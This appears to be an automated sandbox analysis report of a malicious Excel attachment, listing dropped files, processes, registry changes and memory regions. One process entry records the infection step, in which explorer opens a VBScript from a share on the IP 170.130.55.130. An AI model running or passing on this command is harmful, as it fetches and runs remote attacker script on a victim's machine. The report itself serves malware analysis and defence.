Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
re-march-26-2024-9856.xlsx
|
Microsoft Excel 2007+
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\242C445E.gif
|
GIF image data, version 89a, 600 x 306
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\24F09391.gif
|
GIF image data, version 89a, 1692 x 810
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\CCE0.tmp
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\~DF1FD7694CB6FBF19E.TMP
|
data
|
dropped
|
||
|
C:\Users\user\Desktop\~$re-march-26-2024-9856.xlsx
|
data
|
dropped
|
||
|
\Device\Mup\170.130.55.130\PIPE\srvsvc
|
GLS_BINARY_LSB_FIRST
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\SysWOW64\explorer.exe
|
explorer \\170.130.55.130\share\a\Report-26-2024.vbs..........
|
|
|
|
C:\Windows\explorer.exe
|
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
|
|
|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
|
1,
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
|
Enabled
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
|
MTTT
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
|
ReviewToken
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\270AD
|
270AD
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
|
6,
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
|
Max Display
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Max Display
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 1
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 2
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 3
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 4
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 5
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 6
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 7
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 8
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 9
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 10
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 11
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 12
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 13
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 14
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 15
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 16
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 17
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 18
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 19
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 20
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\2CE08
|
2CE08
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
|
Max Display
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Max Display
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 1
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 2
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 3
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 4
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 5
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 6
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 7
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 8
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 9
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 10
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 11
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 12
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 13
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 14
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 15
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 16
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 17
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 18
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 19
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 20
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\2CFCD
|
2CFCD
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
|
LastPurgeTime
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
EXCELFiles
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
ProductFiles
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
VBAFiles
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vbs\OpenWithProgids
|
VBSFile
|
||
|
HKEY_CURRENT_USER_CLASSES\Local Settings\MuiCache\159\52C64B7E
|
@C:\Windows\System32\wshext.dll,-4511
|
||
|
HKEY_CURRENT_USER_CLASSES\Local Settings\MuiCache\159\52C64B7E
|
@C:\Windows\System32\wshext.dll,-4802
|
There are 51 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
1DAF000
|
stack
|
page read and write
|
||
|
257F000
|
stack
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
370000
|
heap
|
page read and write
|
||
|
27BE000
|
heap
|
page read and write
|
||
|
224000
|
heap
|
page read and write
|
||
|
27B0000
|
heap
|
page read and write
|
||
|
1F6F000
|
stack
|
page read and write
|
||
|
1CB0000
|
heap
|
page read and write
|
||
|
259000
|
heap
|
page read and write
|
||
|
604000
|
heap
|
page read and write
|
||
|
88D000
|
heap
|
page read and write
|
||
|
241D000
|
stack
|
page read and write
|
||
|
27D7000
|
heap
|
page read and write
|
||
|
2428000
|
stack
|
page read and write
|
||
|
5E0000
|
heap
|
page read and write
|
||
|
356000
|
heap
|
page read and write
|
||
|
242000
|
heap
|
page read and write
|
||
|
1D0000
|
heap
|
page read and write
|
||
|
27DB000
|
heap
|
page read and write
|
||
|
27D6000
|
heap
|
page read and write
|
||
|
632000
|
heap
|
page read and write
|
||
|
242E000
|
stack
|
page read and write
|
||
|
27DB000
|
heap
|
page read and write
|
||
|
62D000
|
heap
|
page read and write
|
||
|
63B000
|
heap
|
page read and write
|
||
|
20E000
|
heap
|
page read and write
|
||
|
625000
|
heap
|
page read and write
|
||
|
20AF000
|
stack
|
page read and write
|
||
|
62B000
|
heap
|
page read and write
|
||
|
AC000
|
stack
|
page read and write
|
||
|
360000
|
heap
|
page read and write
|
||
|
230000
|
heap
|
page read and write
|
||
|
251E000
|
stack
|
page read and write
|
||
|
25BE000
|
stack
|
page read and write
|
||
|
1CB5000
|
heap
|
page read and write
|
||
|
27B5000
|
heap
|
page read and write
|
||
|
267F000
|
stack
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
26C000
|
heap
|
page read and write
|
||
|
1DB000
|
stack
|
page read and write
|
||
|
62A000
|
heap
|
page read and write
|
||
|
870000
|
heap
|
page read and write
|
||
|
3A0000
|
heap
|
page read and write
|
||
|
220000
|
heap
|
page read and write
|
||
|
1CEB000
|
heap
|
page read and write
|
||
|
1AB000
|
stack
|
page read and write
|
||
|
31EF000
|
stack
|
page read and write
|
||
|
1D7000
|
heap
|
page read and write
|
||
|
262000
|
heap
|
page read and write
|
||
|
5E7000
|
heap
|
page read and write
|
||
|
267F000
|
stack
|
page read and write
|
||
|
624000
|
heap
|
page read and write
|
||
|
350000
|
heap
|
page read and write
|
||
|
27B9000
|
heap
|
page read and write
|
||
|
3A6000
|
heap
|
page read and write
|
||
|
214E000
|
stack
|
page read and write
|
||
|
364000
|
heap
|
page read and write
|
There are 48 hidden memdumps, click here to show them.